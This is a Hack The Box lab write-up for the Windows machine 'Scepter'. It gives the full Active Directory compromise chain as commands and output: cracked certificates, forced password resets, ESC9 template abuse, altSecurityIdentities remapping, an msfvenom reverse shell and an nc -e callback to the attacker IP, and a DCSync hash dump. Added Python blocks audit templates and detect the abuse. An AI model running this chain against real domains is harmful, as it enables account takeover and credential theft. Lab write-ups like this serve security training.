Hack The Box / WINDOWS / 2026-03-18
Hack The Box — Scepter (Windows)
NFS certificate discovery and ADCS abuse chain from d.baker to h.brown, ACL and altSecurityIdentities mapping to compromise p.adams, then DCSync to Administrator.
Target
- IP: 10.129.230.235
Recon
sudo nmap -sC -sV 10.129.230.235 -p- -T5 -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-20 05:45:57Z)
111/tcp open rpcbind?
| rpcinfo:
| program version port/proto service
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
|_ 100003 2,3,4 2049/tcp6 nfs
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-20T05:47:01+00:00; +8h00m02s from scanner time.
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Issuer: commonName=scepter-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-01T03:22:33
| Not valid after: 2025-11-01T03:22:33
| MD5: 2af6:88f7:a6bf:ef50:9b84:3dc6:3df5:e018
|_SHA-1: cd9a:97ee:25c8:00ba:1427:c259:02ed:6e0d:9a21:7fd9
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-20T05:47:02+00:00; +8h00m02s from scanner time.
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Issuer: commonName=scepter-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-01T03:22:33
| Not valid after: 2025-11-01T03:22:33
| MD5: 2af6:88f7:a6bf:ef50:9b84:3dc6:3df5:e018
|_SHA-1: cd9a:97ee:25c8:00ba:1427:c259:02ed:6e0d:9a21:7fd9
2049/tcp open nfs 2-4 (RPC #100003)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-20T05:47:01+00:00; +8h00m02s from scanner time.
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Issuer: commonName=scepter-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-01T03:22:33
| Not valid after: 2025-11-01T03:22:33
| MD5: 2af6:88f7:a6bf:ef50:9b84:3dc6:3df5:e018
|_SHA-1: cd9a:97ee:25c8:00ba:1427:c259:02ed:6e0d:9a21:7fd9
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Issuer: commonName=scepter-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-01T03:22:33
| Not valid after: 2025-11-01T03:22:33
| MD5: 2af6:88f7:a6bf:ef50:9b84:3dc6:3df5:e018
|_SHA-1: cd9a:97ee:25c8:00ba:1427:c259:02ed:6e0d:9a21:7fd9
|_ssl-date: 2025-04-20T05:47:02+00:00; +8h00m02s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: DNS:dc01.scepter.htb
| Issuer: commonName=dc01.scepter.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-01T00:21:41
| Not valid after: 2025-11-01T00:41:41
| MD5: e84c:6894:816e:b7f5:4338:0a1f:a896:2075
|_SHA-1: 4e58:3799:020d:aaf4:d5ce:0c1e:76db:32cd:5a0e:28a7
|_ssl-date: 2025-04-20T05:47:02+00:00; +8h00m02s from scanner time.
|_http-title: Not Found
| tls-alpn:
|_ http/1.1
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49678/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49679/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
49710/tcp open msrpc Microsoft Windows RPC
49716/tcp open msrpc Microsoft Windows RPC
49739/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-04-20T05:46:50
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 8h00m01s, deviation: 0s, median: 8h00m01s
Add dc01.scepter.htb and scepter.htb to /etc/hosts.
showmount -e 10.129.230.235
Export list for 10.129.230.235:
/helpdesk (everyone)
sudo mount -t nfs 10.129.230.235:/helpdesk ./mnt -o nolock
Inside the mounted share (./mnt) we find these files:
baker.crt baker.key clark.pfx lewis.pfx scott.pfx
openssl x509 -in baker.crt -text -noout
We find an email:
d.baker@scepter.htb
pfx2john *.pfx > hash
./john/run/john --wordlist=./rockyou.txt ./hash
newpassword (lewis.pfx)
newpassword (clark.pfx)
newpassword (scott.pfx)
certipy cert -export -pfx lewis.pfx -password newpassword -out "lewis_unprotected.pfx"
certipy cert -export -pfx clark.pfx -password newpassword -out "clark_unprotected.pfx"
certipy cert -export -pfx scott.pfx -password newpassword -out "scott_unprotected.pfx"
strings *unprotected.pfx | grep scepter
We find more emails:
m.clark@scepter.htb
o.scott@scepter.htb
e.lewis@scepter.htb
If we try authenticating with one of these certificates, for example:
certipy auth -pfx lewis_unprotected.pfx
We get:
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Same for the others.
openssl pkcs12 -export -out baker.pfx -inkey baker.key -in baker.crt
Enter newpassword as passphrase for baker.key.
sudo ntpdate dc01.scepter.htb
certipy auth -pfx baker.pfx -domain 'scepter.htb' -dc-ip 10.129.230.235
[*] Got hash for 'd.baker@scepter.htb': aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce
bloodhound-python -u 'd.baker' --hashes ':18b5fb0d99e7a475316213c15b6f22ce' -ns 10.129.230.235 -d 'scepter.htb' -dc 'dc01.scepter.htb' -c All --zip
A .zip file is created.
sudo neo4j console
bloodhound --no-sandbox
Upload the zip into BloodHound.
In BloodHound, click d.baker --> node info --> transitive object control.
We see d.baker has a forcechangepassword relation to a.carter.
Download bloodyAD:
- https://github.com/CravateRouge/bloodyAD
python3 bloodyAD/bloodyAD.py --host 'dc01.scepter.htb' -d scepter.htb --dc-ip dc01.scepter.htb -u 'd.baker' -p ':18b5fb0d99e7a475316213c15b6f22ce' set password 'a.carter' '!Kali12345678!'
[+] Password changed successfully!
nxc smb 10.129.230.235 -u a.carter -p '!Kali12345678!'
SMB 10.129.230.235 445 DC01 [+] scepter.htb\a.carter:!Kali12345678!
In BloodHound, click a.carter --> node info --> transitive object control.
We see a.carter is a member of the group IT SUPPORT, which has GenericAll over STAFF ACCESS CERTIFICATE.
staff access certificate is an organizational unit (OU).
dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'a.carter' -target-dn 'OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB' 'scepter.htb'/'a.carter':'!Kali12345678!'
[*] DACL modified successfully!
dacledit.py -action 'read' -principal 'a.carter' -target-dn 'OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB' 'scepter.htb'/'a.carter':'!Kali12345678!'
[*] Parsing DACL
[*] Printing parsed DACL
[*] Filtering results for SID (S-1-5-21-74879546-916818434-740295365-1107)
[*] ACE[7] info
[*] ACE Type : ACCESS_ALLOWED_ACE
[*] ACE flags : CONTAINER_INHERIT_ACE, OBJECT_INHERIT_ACE
[*] Access mask : FullControl (0xf01ff)
[*] Trustee (SID) : a.carter (S-1-5-21-74879546-916818434-740295365-1107)
python3 bloodyAD/bloodyAD.py --host 'dc01.scepter.htb' -d scepter.htb --dc-ip dc01.scepter.htb -u 'a.carter' -p '!Kali12345678!' set password 'd.baker' '!Kali12345678!'
certipy find -u d.baker -hashes '18b5fb0d99e7a475316213c15b6f22ce' -target scepter.htb -text -stdout -vulnerable
Template Name : StaffAccessCertificate
Display Name : StaffAccessCertificate
Certificate Authorities : scepter-DC01-CA
Certificate Name Flag : SubjectRequireEmail
SubjectRequireDnsAsCn
SubjectAltRequireEmail
Permissions
Enrollment Permissions
Enrollment Rights : SCEPTER.HTB\staff
[!] Vulnerabilities
ESC9 : 'SCEPTER.HTB\\staff' can enroll and template has no security extension
d.baker is part of group staff.
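To make the ESC9 finding above concrete from the defender's side, here is an added Python audit (not certipy's code and not part of this write-up) that decodes a template's msPKI-Enrollment-Flag and msPKI-Certificate-Name-Flag bit masks and reports templates that carry no security extension, are usable for logon, and can be enrolled by a non-privileged principal. The bit values are the ones defined in MS-CRTD; the template records are constructed sample data modelled on the certipy output, and nothing here queries a CA or a domain controller.

```python
# Added example: audit certificate templates for the ESC9 precondition.
# Template records are constructed sample data; no CA or DC is contacted.
from dataclasses import dataclass, field

# msPKI-Enrollment-Flag bit (MS-CRTD): issued certs get no szOID_NTDS_CA_SECURITY_EXT.
CT_FLAG_NO_SECURITY_EXTENSION = 0x00080000

# msPKI-Certificate-Name-Flag bits (MS-CRTD) that decide what identity the cert carries.
NAME_FLAGS = [
    (0x00000001, "EnrolleeSuppliesSubject"),
    (0x00010000, "EnrolleeSuppliesSubjectAltName"),
    (0x02000000, "SubjectAltRequireUpn"),
    (0x04000000, "SubjectAltRequireEmail"),
    (0x08000000, "SubjectAltRequireDns"),
    (0x10000000, "SubjectRequireDnsAsCn"),
    (0x20000000, "SubjectRequireEmail"),
    (0x40000000, "SubjectRequireCommonName"),
    (0x80000000, "SubjectRequireDirectoryPath"),
]

# Which directory attribute feeds each SAN component; whoever can write that
# attribute on an enrolling account decides whom the certificate maps to.
SAN_SOURCE_ATTR = {
    "SubjectAltRequireUpn": "userPrincipalName",
    "SubjectAltRequireEmail": "mail",
    "SubjectAltRequireDns": "dNSHostName",
}

# EKUs that let a certificate be used for Kerberos/Schannel logon.
AUTH_EKUS = {"Client Authentication", "Smart Card Logon",
             "PKINIT Client Authentication", "Any Purpose"}


@dataclass
class Template:
    name: str
    enrollment_flag: int
    name_flag: int
    enrollment_rights: list
    ekus: list = field(default_factory=list)


def decode_name_flag(value):
    """Return the symbolic names of the bits set in msPKI-Certificate-Name-Flag."""
    return [name for bit, name in NAME_FLAGS if value & bit]


def esc9_findings(templates, privileged_principals):
    """Templates where an unprivileged principal can enroll for a logon-capable
    certificate that carries no SID security extension."""
    privileged = {p.lower() for p in privileged_principals}
    findings = []
    for t in templates:
        if not t.enrollment_flag & CT_FLAG_NO_SECURITY_EXTENSION:
            continue
        # An empty EKU list means "any purpose", which does allow logon.
        if t.ekus and not set(t.ekus) & AUTH_EKUS:
            continue
        enrollers = [p for p in t.enrollment_rights if p.lower() not in privileged]
        if not enrollers:
            continue
        flags = decode_name_flag(t.name_flag)
        san = [f for f in flags if f in SAN_SOURCE_ATTR]
        findings.append({
            "template": t.name,
            "enrollers": enrollers,
            "mapped_by": san or ["(subject only)"],
            "attributes_at_risk": [SAN_SOURCE_ATTR[f] for f in san],
        })
    return findings


# Constructed sample data (modelled on the certipy output above, not pulled from the box).
SAMPLE_TEMPLATES = [
    Template("StaffAccessCertificate", CT_FLAG_NO_SECURITY_EXTENSION,
             0x20000000 | 0x10000000 | 0x04000000,
             ["SCEPTER.HTB\\staff"], ["Client Authentication"]),
    Template("User", 0x00000029, 0xA6000000,
             ["SCEPTER.HTB\\Domain Users"], ["Client Authentication", "Secure Email"]),
    Template("Machine", CT_FLAG_NO_SECURITY_EXTENSION, 0x08000000,
             ["SCEPTER.HTB\\Domain Admins"], ["Client Authentication", "Server Authentication"]),
    Template("CodeSign", CT_FLAG_NO_SECURITY_EXTENSION, 0x20000000 | 0x04000000,
             ["SCEPTER.HTB\\staff"], ["Code Signing"]),
]
PRIVILEGED = ["SCEPTER.HTB\\Domain Admins", "SCEPTER.HTB\\Enterprise Admins"]

if __name__ == "__main__":
    for f in esc9_findings(SAMPLE_TEMPLATES, PRIVILEGED):
        print(f"[!] {f['template']}: enrollable by {f['enrollers']}, "
              f"mapped via {f['mapped_by']}, attributes to protect: {f['attributes_at_risk']}")
```

Of the four constructed templates only StaffAccessCertificate is reported: User still carries the security extension, Machine is enrollable only by Domain Admins, and CodeSign cannot be used for logon. The report also names the directory attribute (here mail) that the KDC will trust in place of the missing SID, which is exactly the attribute that gets rewritten in the steps that follow.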
certipy shadow auto -username a.carter@scepter.htb -password '!Kali12345678!' -account d.baker
[*] NT hash for 'd.baker': 18b5fb0d99e7a475316213c15b6f22ce
certipy account update -username a.carter@scepter.htb -password '!Kali12345678!' -user d.baker -upn h.brown
[*] Updating user 'd.baker':
userPrincipalName : Administrator
[*] Successfully updated 'd.baker'
From the certipy find output we notice that the template requires an email address (SubjectRequireEmail and SubjectAltRequireEmail), so the mail attribute must be populated on d.baker.
Check whether the mail attribute is set:
ldapsearch -x -H ldap://dc01.scepter.htb -D "a.carter" -w '!Kali12345678!' -b "CN=D.BAKER,OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB" mail
It is not set.
python3 bloodyAD/bloodyAD.py --host 'dc01.scepter.htb' -d scepter.htb --dc-ip dc01.scepter.htb -u 'a.carter' -p '!Kali12345678!' set object 'd.baker' mail -v 'h.brown@scepter.htb'
[+] d.baker's mail has been updated
Now if we execute the previous ldapsearch command we can see the mail is set.
certipy req -username "d.baker@scepter.htb" -hashes '18b5fb0d99e7a475316213c15b6f22ce' -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate'
[*] Saved certificate and private key to 'd.baker.pfx'
Reset the UPN:
certipy account update -username a.carter@scepter.htb -password '!Kali12345678!' -user d.baker -upn d.baker
certipy auth -pfx d.baker.pfx -domain scepter.htb -username h.brown
[*] Saved credential cache to 'h.brown.ccache'
[*] Got hash for 'h.brown@scepter.htb': aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c
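The sequence just performed (userPrincipalName rewritten to another account's name, mail set to match, certificate requested on a template without the security extension, UPN reset) is visible in the directory change log and the CA log. The following is an added Python detection (not part of the write-up or any product) that correlates those records. It assumes Directory Service Changes auditing is enabled so that event 5136 exists and that CA issuance events (4887) are collected; the records below are constructed, simplified versions of those events, not real log lines, and NO_SID_EXT_TEMPLATES is assumed to come from a template audit.

```python
# Added example: correlate identity-attribute rewrites on one account with a
# certificate issued to that account from a template lacking the SID extension.
# Event records are constructed and simplified, not real Windows events.
from datetime import datetime, timedelta

IDENTITY_ATTRS = {"userprincipalname", "mail"}          # attributes the KDC maps on
NO_SID_EXT_TEMPLATES = {"StaffAccessCertificate"}       # assumed output of a template audit
KNOWN_ACCOUNTS = {"administrator", "d.baker", "a.carter", "h.brown", "p.adams"}

DN_BAKER = "CN=D.BAKER,OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB"
DN_ADAMS = "CN=p.adams,OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb"

# Constructed events: the attack sequence, followed by benign helpdesk noise.
EVENTS = [
    {"t": "2025-04-20T05:50:01", "id": 5136, "actor": "a.carter", "object": DN_BAKER,
     "attr": "userPrincipalName", "op": "added", "value": "h.brown"},
    {"t": "2025-04-20T05:50:30", "id": 5136, "actor": "a.carter", "object": DN_BAKER,
     "attr": "mail", "op": "added", "value": "h.brown@scepter.htb"},
    {"t": "2025-04-20T05:51:10", "id": 4887, "requester": "SCEPTER\\d.baker",
     "template": "StaffAccessCertificate"},
    {"t": "2025-04-20T05:52:00", "id": 5136, "actor": "a.carter", "object": DN_BAKER,
     "attr": "userPrincipalName", "op": "added", "value": "d.baker"},
    {"t": "2025-04-20T06:10:00", "id": 5136, "actor": "helpdesk", "object": DN_ADAMS,
     "attr": "userPrincipalName", "op": "added", "value": "p.adams@scepter.htb"},
    {"t": "2025-04-20T06:11:00", "id": 4887, "requester": "SCEPTER\\p.adams",
     "template": "StaffAccessCertificate"},
]


def account_from_dn(dn):
    """'CN=D.BAKER,OU=...' -> 'd.baker'."""
    return dn.split(",", 1)[0].split("=", 1)[1].lower()


def local_part(value):
    """'h.brown@scepter.htb' -> 'h.brown'; a bare name is returned unchanged."""
    return value.split("@", 1)[0].lower()


def detect_identity_swap(events, window=timedelta(minutes=30)):
    """Flag a certificate issued to an account whose UPN or mail was recently
    pointed at a different existing account. Returns one finding per issuance."""
    pending = {}   # account -> details of the suspicious rewrite
    findings = []
    for e in sorted(events, key=lambda ev: ev["t"]):
        ts = datetime.fromisoformat(e["t"])
        if e["id"] == 5136 and e["attr"].lower() in IDENTITY_ATTRS and e["op"] == "added":
            acct = account_from_dn(e["object"])
            target = local_part(e["value"])
            if target != acct and target in KNOWN_ACCOUNTS:
                # Identity attribute of `acct` now names some other account.
                entry = pending.setdefault(acct, {"first": ts, "actor": e["actor"],
                                                  "impersonated": target, "attrs": []})
                entry["attrs"].append(e["attr"])
            elif target == acct and acct in pending and "reverted" not in pending[acct]:
                pending[acct]["reverted"] = ts     # attacker cleaning up after enrolment
        elif e["id"] == 4887:
            req = local_part(e["requester"].split("\\")[-1])
            p = pending.get(req)
            if p and ts - p["first"] <= window and e["template"] in NO_SID_EXT_TEMPLATES:
                findings.append({"account": req, "impersonated": p["impersonated"],
                                 "changed_by": p["actor"], "attributes": list(p["attrs"]),
                                 "template": e["template"], "issued_at": e["t"],
                                 "trace": p})
    return findings


if __name__ == "__main__":
    for f in detect_identity_swap(EVENTS):
        print(f"[!] {f['account']} enrolled in {f['template']} at {f['issued_at']} while its "
              f"{f['attributes']} pointed at {f['impersonated']} (changed by {f['changed_by']})")
```

Only the d.baker enrolment is reported: p.adams's UPN was set to its own name, so the later p.adams enrolment has no pending rewrite to pair with. Because the finding keeps a reference to the pending record, the later revert of d.baker's UPN is attached to it as well, which is a useful detail when triaging.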
export KRB5CCNAME='h.brown.ccache'
nxc smb dc01.scepter.htb -d scepter.htb -k --use-kcache
SMB dc01.scepter.htb 445 DC01 [+] scepter.htb\h.brown from ccache
nxc smb dc01.scepter.htb -d scepter.htb -u 'h.brown' --hash '4ecf5242092c6fb8c360a08069c75a0c'
SMB 10.129.187.180 445 DC01 [-] scepter.htb\h.brown:4ecf5242092c6fb8c360a08069c75a0c STATUS_ACCOUNT_RESTRICTION
sudo vim /etc/krb5.conf
Under [realms], add these lines:
SCEPTER.HTB = {
    kdc = dc01.scepter.htb
}
evil-winrm -i dc01.scepter.htb -r scepter.htb
We get a PowerShell shell as user h.brown.
Since this shell is not very stable (it crashes shortly after), we get a Meterpreter session.
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.252 LPORT=4444 -f exe -o reverse.exe
Upload reverse.exe to the target machine.
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set LHOST tun0
set LPORT 4444
run
Execute reverse.exe.
We get a Meterpreter session.
Or we can get a reverse shell with nc64.exe.
Download nc64.exe and upload to target:
- https://github.com/int0x33/nc.exe/raw/refs/heads/master/nc64.exe
Listen with netcat:
rlwrap nc -vlnp 5555
.\nc64.exe -e cmd.exe 10.10.14.252 5555
We get a reverse shell.
Download PowerView.ps1 and upload it to target:
- https://github.com/PowerShellMafia/PowerSploit/raw/refs/heads/master/Recon/PowerView.ps1
. .\PowerView.ps1
Find-InterestingDomainAcl
ObjectDN : CN=p.adams,OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb
AceQualifier : AccessAllowed
ActiveDirectoryRights : WriteProperty
ObjectAceType : 00fbf30c-91fe-11d1-aebc-0000f80367c1
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowedObject
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-74879546-916818434-740295365-1601
IdentityReferenceName : CMS
IdentityReferenceDomain : scepter.htb
IdentityReferenceDN : CN=CMS,CN=Users,DC=scepter,DC=htb
IdentityReferenceClass : group
ObjectDN : OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb
AceQualifier : AccessAllowed
ActiveDirectoryRights : WriteProperty
ObjectAceType : 00fbf30c-91fe-11d1-aebc-0000f80367c1
AceFlags : ContainerInherit, InheritOnly
AceType : AccessAllowedObject
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-74879546-916818434-740295365-1601
IdentityReferenceName : CMS
IdentityReferenceDomain : scepter.htb
IdentityReferenceDN : CN=CMS,CN=Users,DC=scepter,DC=htb
IdentityReferenceClass : group
Group CMS has WriteProperty over user p.adams and over the OU Helpdesk Enrollment Certificate, specifically on the attribute with schema GUID 00fbf30c-91fe-11d1-aebc-0000f80367c1, which is altSecurityIdentities.
We can define a certificate mapping to user p.adams.
Useful sites:
- https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16
- https://support.oneidentity.com/technical-documents/safeguard-authentication-services/5.0.3/authentication-services-for-smart-cards-administration-guide/15
- https://learn.microsoft.com/en-us/archive/blogs/spatdsg/howto-map-a-user-to-a-certificate-via-all-the-methods-available-in-the-altsecurityidentities-attribute
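KB5014754 (first link above) sorts altSecurityIdentities formats into strong mappings (<I>...<SR>..., <SKI>..., <SHA1-PUKEY>...) and weak ones (<I>...<S>..., <S>..., <RFC822>...); the X509:<RFC822> form used in the next steps is a weak one, which is why the KB's Full Enforcement mode rejects it. The following added Python (not from the write-up, Microsoft, or any tool) classifies mapping values by those rules, builds the strong issuer-plus-serial form, and audits a set of accounts for weak mappings. The account names and mapping values are constructed sample data; the issuer DN passed to issuer_serial_mapping is assumed to already be in the reversed, DC-first form the mapping syntax uses.

```python
# Added example: classify altSecurityIdentities values per KB5014754 and
# build the strong <I>...<SR>... form. Sample values are constructed.
import re

# Tag sequences from KB5014754. <SR> is the serial number in reversed byte order,
# <SKI> the Subject Key Identifier, <SHA1-PUKEY> the SHA-1 of the public key.
# The weak forms bind on a name or e-mail string that anyone with write access
# to the matching directory attribute can reproduce.
STRONG_FORMS = {("I", "SR"), ("SKI",), ("SHA1-PUKEY",)}
WEAK_FORMS = {("I", "S"), ("S",), ("RFC822",)}


def classify_mapping(value):
    """Return 'strong', 'weak' or 'invalid' for one altSecurityIdentities value."""
    if not value.upper().startswith("X509:"):
        return "invalid"
    tags = tuple(t.upper() for t in re.findall(r"<([A-Za-z0-9-]+)>", value[5:]))
    if tags in STRONG_FORMS:
        return "strong"
    if tags in WEAK_FORMS:
        return "weak"
    return "invalid"


def issuer_serial_mapping(issuer, serial_hex):
    """Build the strong X509:<I>issuer<SR>serial value.

    `issuer` is assumed to be in the mapping's own reversed, DC-first form
    (e.g. DC=htb,DC=scepter,CN=scepter-DC01-CA); `serial_hex` is the serial as
    shown in the certificate, which the mapping stores byte-reversed."""
    raw = bytes.fromhex(serial_hex)
    return f"X509:<I>{issuer}<SR>{raw[::-1].hex().upper()}"


def audit(mappings):
    """mappings: {account: [altSecurityIdentities values]} -> accounts with any
    value that is not a strong mapping, with the offending values."""
    result = {}
    for acct, values in mappings.items():
        bad = [v for v in values if classify_mapping(v) != "strong"]
        if bad:
            result[acct] = bad
    return result


# Constructed sample accounts; the p.adams value is the one written in the steps below.
SAMPLE = {
    "p.adams": ["X509:<RFC822>test@test.com"],
    "svc-backup": [issuer_serial_mapping("DC=htb,DC=scepter,CN=scepter-DC01-CA",
                                         "2B0000000011AC0000000012")],
    "j.doe": ["X509:<S>CN=j.doe,OU=Users,DC=scepter,DC=htb", "X509:<SKI>0123456789ABCDEF"],
}

if __name__ == "__main__":
    for acct, bad in audit(SAMPLE).items():
        print(f"[!] {acct}: non-strong mapping(s) {bad}")
```

svc-backup passes because its only mapping pins issuer and serial, while j.doe is reported even though it also has a strong <SKI> mapping: a single weak value on the account is enough for a certificate with a matching subject to be accepted while the DC is in Compatibility mode.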
python3 bloodyAD/bloodyAD.py --host 'dc01.scepter.htb' -d scepter.htb --dc-ip dc01.scepter.htb -u 'a.carter' -p '!Kali12345678!' set object 'd.baker' mail -v 'test@test.com'
[+] d.baker's mail has been updated
certipy req -username "d.baker@scepter.htb" -hashes '18b5fb0d99e7a475316213c15b6f22ce' -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate'
[*] Saved certificate and private key to 'd.baker.pfx'
python3 bloodyAD/bloodyAD.py --host 'dc01.scepter.htb' -d scepter.htb --dc-ip 10.129.36.19 -k set object 'p.adams' altSecurityIdentities -v 'X509:<RFC822>test@test.com'
[+] p.adams's altSecurityIdentities has been updated
certipy auth -pfx d.baker.pfx -domain scepter.htb -username p.adams -dc-ip 10.129.36.19
[*] Saved credential cache to 'p.adams.ccache'
[*] Trying to retrieve NT hash for 'p.adams'
[*] Got hash for 'p.adams@scepter.htb': aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0
nxc smb dc01.scepter.htb -d scepter.htb -u 'p.adams' --hash '1b925c524f447bb821a8789c4b118ce0'
SMB 10.129.36.19 445 DC01 [+] scepter.htb\p.adams:1b925c524f447bb821a8789c4b118ce0
In BloodHound, user p.adams has a DCSync edge to the domain scepter.htb.
secretsdump.py 'scepter.htb'/'p.adams'@dc01.scepter.htb -hashes ':1b925c524f447bb821a8789c4b118ce0'
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a291ead3493f9773dc615e66c2ea21c4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c030fca580038cc8b1100ee37064a4a9:::
d.baker\d.baker:1106:aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce:::
scepter.htb\a.carter:1107:aad3b435b51404eeaad3b435b51404ee:2e24650b1e4f376fa574da438078d200:::
scepter.htb\h.brown:1108:aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c:::
scepter.htb\p.adams:1109:aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0:::
scepter.htb\e.lewis:2101:aad3b435b51404eeaad3b435b51404ee:628bf1914e9efe3ef3a7a6e7136f60f3:::
scepter.htb\o.scott:2102:aad3b435b51404eeaad3b435b51404ee:3a4a844d2175c90f7a48e77fa92fce04:::
scepter.htb\M.clark:2103:aad3b435b51404eeaad3b435b51404ee:8db1c7370a5e33541985b508ffa24ce5:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:0a4643c21fd6a17229b18ba639ccfd5f:::
evil-winrm -i dc01.scepter.htb -u Administrator -H a291ead3493f9773dc615e66c2ea21c4
We get a PowerShell shell as user Administrator.